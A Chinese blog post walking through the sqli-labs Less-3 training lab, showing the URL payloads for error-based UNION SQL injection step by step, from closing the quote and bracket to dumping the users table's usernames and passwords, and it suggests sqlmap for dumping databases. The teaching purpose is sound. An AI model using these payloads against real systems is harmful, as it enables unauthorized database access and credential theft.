【SQL注入攻击】GET-Error based-Single quotes with twist-String(基于错误的GET单引号变形字符型注入)

最新推荐文章于 2023-05-28 16:10:53 发布
最新推荐文章于 2023-05-28 16:10:53 发布
阅读量387 收藏 1
点赞数
分类专栏: 漏洞学习 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sm1918451478/article/details/127623235
版权

hackbar

页面观察

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dUUwqBJm-1667220714705)(assets/image-20221021205423-ky1nlvg.png)]​

将id作为参数点注入

注入id=1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vkJVesyq-1667220714706)(assets/image-20221021205512-knad7pz.png)]​

会有正常的回显

判断注入点

注入id=1’

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-U1Ubd4Cs-1667220714707)(assets/image-20221021205611-6jhsm08.png)]​

根据错误提示,我们可以很容易分析到这里的sql查询语句为

SELECT * FROM users WHERE id=('1'')

这明显就是错误的,所以需要在1后面的第一引号处,加入)–+进行闭合

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Q7YudyD9-1667220714708)(assets/image-20221021210058-1dpzkg3.png)]​

成功获得了正确的回显信息

判断字段数

?id=1') order by 3--+// 这里需要注意的是一定要闭合情况下进行判断

一次输入1、2、3、4…

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2FEsrqIU-1667220714708)(assets/image-20221021210636-4h0kjht.png)]​

到4就报错了,说明只有3个字段

判断回显位

?id=1') and 0 union select 1,2,3 --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s2wrPW97-1667220714709)(assets/image-20221021210751-9mrbwox.png)]​

回显位为2、3位

爆数据库名

?id=1') and 0 union select 1,2,database() --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qbaxm94O-1667220714710)(assets/image-20221021211107-3qh80d1.png)]​

爆数据表名

?id=1') and 0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BZw8hqfw-1667220714711)(assets/image-20221021211206-976yg0g.png)]​

爆数据表的字段

?id=1') and 0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ovoeKRfe-1667220714712)(assets/image-20221021211304-89dbrft.png)]​

爆数据表内容

?id=1') and 0 union select 1,group_concat(concat_ws(':',id,username,password)),3 from users --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-racYynOH-1667220714713)(assets/image-20221021211355-zcy7be6.png)]​

成功拿到所有的数据,如果不是要学习整个过程的话,建议直接用sqlmap进行数据库脱库,多快好省!

Cinnam0n
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
to-single-quotes-cli:将匹配的双引号转换为单引号
04-29
单引号cli 将匹配的双引号转换为单引号: I "love" unicorns → I 'love' unicorns安装$ npm install --global to-single-quotes-cli用法$ to-single-quotes --help Usage $ to-single-quotes <string> $ echo ...
(手工)【sqli-labs靶场1-4】GET请求、错误注入单引号、双引号、括号闭合、字符、整
05-26 1248
sqllabs靶场1-4】无省略+手工
SQL注入闯关第二关---第四关
qq_54037445的博客
10-06 1475
sqlilab,sql注入闯关第二关到第四关详细讲解
sqli-labs通关-------03lesson-single_quotes_with_twist
枯藤闲画云
05-31 609
基于括号 用?id=1 没问题啥都有 试试单引号,报错如下 然后我们就试试)发现差不多 但是我们会发现一个很尴尬的问题 就是and1=2 前面竟然没有爆错????看看源码,打印语句 http://127.0.0.1:90/sqli-labs/Less-3/?id=2) and 1=2 union select 1,2,3--+ 只有这样我们才能成功!!!加上引...
sqlilabs Less-3 GET-Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)_小白鼠日常
captainLink的博客
06-10 227
sqlilabs-less3通关(小白鼠日常)
最详细sqli-labs平台前十关讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 3060
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
SQLi-Labs】Less-3 GET - Error based - Single quotes with twist
xw1995115的博客
11-15 454
与less-1、less-2原理相同,基于报错提示我们可以大致猜测后台sql逻辑,为了产生报错需要人为制造语法错误SQL注入中常使用单引号来制造错误 ?id=1' 观察报错提示,发现除了需要封闭单引号外还需要额外封闭一个括号,因此构造以下查询 ?id=-1') union select 1,database(),user() --+ 查询被成功执行,可利用union select执行更多查询,至此本节结束 ...
php中$_GET与$_POST过滤sql注入的方法
01-21
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下: 此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。 主要实现代码如下: 复制代码 代码如下:...
sublime-text-latex-smart-quotes:Sublime Text Package,以一种聪明的方式插入引号
05-10
此Sublime Text Package的目的是使LaTeX中的引号“聪明”,即插入您打算使用的引号。 它的灵感来自于Emacs的。 要建立此目标,它使用: 语言检测(支持的语言:英语,德语,法语) 根据插入位置进行上下文检测 ...
PHP与SQL注入攻击[二]
10-30
SQL注入攻击是黑客通过向应用程序提交恶意SQL代码,从而控制或操纵数据库的一种手段。这种攻击方式可能导致数据泄露、用户账户被劫持,甚至整个数据库的破坏。 **Magic Quotes** 是PHP早期提供的一种安全特性,用于...
sqli-labs大详解
gankjk的博客
10-19 6598
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入) 首先输入参数?id=1,这时页面正常显示,并不报错。 这时我们输入?id=1‘时出现报错,可以判断它是单引号注入 常规注入,判断字段数,当我们order by10时,发生错误,然后我们用二分法判断有几个字段(向上取整)。 当我们到order by 3 时没有报错,这时候我们试试order by 4,发现报错,说明只有三个字段。 然后我们看回显...
sqli-lab平台注入练习三,四
chuxuezheerer的博客
10-03 165
Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入) 还是先判断这是一个什么类注入 尝试输入:可以看到报错信息中出现了类似)的东西尝试带上),http://127.0.0.1/sqli-labs-master/Less-3/?id=1') --+ 发现网页可以显示出来,就此判断这个网页的闭...
sqli-lab教程——Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)
luosaierdadi的博客
07-06 136
输入单引号,根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了,猜想一下咱们输入1在数据库语句中的位置,形如select ... from ... where id=(‘1’) ...,在第一题中id=1‘的后面单引号加上),其它保持不变就行了。其实我推荐,做完题去看看它题目的php传参语句,和过滤语句,对理解sql注入原理很有帮助的。......
SQL注入--基于错误的GET单引号字符注入
Leslieyzz的博客
02-14 479
SQL注入--基于错误的GET单引号字符注入
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4404
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
sqli-lab练习(三)--------GET-Error based-Single quotes with twist-String
wkend的博客
04-16 576
sql语句源代码 $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; 首先,我们先构造一个单引号注入' 我们来分析,错误提示'''') LIMIT 0,1' 由于在sql语句中,单引号的数量都是双数的,这样才能正确的闭合语句,但是在错误提示中我们可以看到,出现了5个',这就出现了问题,sql语句没有正常闭合。 而且,根据sql...
sql-labs SQL注入平台-第3关Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)
最新发布
Onlyone_1314的博客
05-28 215
Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)查看源代码发现我们输入的id值被括号(‘’)包围起来了,这样导致我们输入的值都会被当作括号里的id。成功使用union联合查询。
学习spli-lab,记录学习。
liuniliu的博客
02-16 462
1
sqli-labs】 less3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)...
ajxi63204的博客
01-18 367
实质上和less1没有多大区别,看懂了一样走流程 提交参数 加单引号 http://localhost/sqli/Less-3/?id=1' 观察报错,看near 和 at 的引号之间内容 '1'') LIMIT 0,1 1后面有一个 ' 是我们添加的,于是正常的sql语句应该是 select ... from ... where xx=('...
std::string字符串拼加单引号的示例
04-27
好的,我可以为您提供一个示例代码,用于将一个std::string字符串拼接成单引号包裹的形式: ``` #include <string> #include <iostream> std::string add_single_quotes(std::string str) { return "'" + str + "'"; } int main() { std::string str = "hello world"; std::string quoted_str = add_single_quotes(str); std::cout << quoted_str << std::endl; // Output: 'hello world' return 0; } ``` 这段代码定义了一个名为`add_single_quotes`的函数,它接受一个std::string参数,并返回一个新的std::string,其中原始字符串被用单引号括起来。然后在主函数中,我们将一个字符串传递给该函数并打印结果。 请注意,这只是一个简单的示例,实际应用中您需要考虑更多的字符串处理和错误处理情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值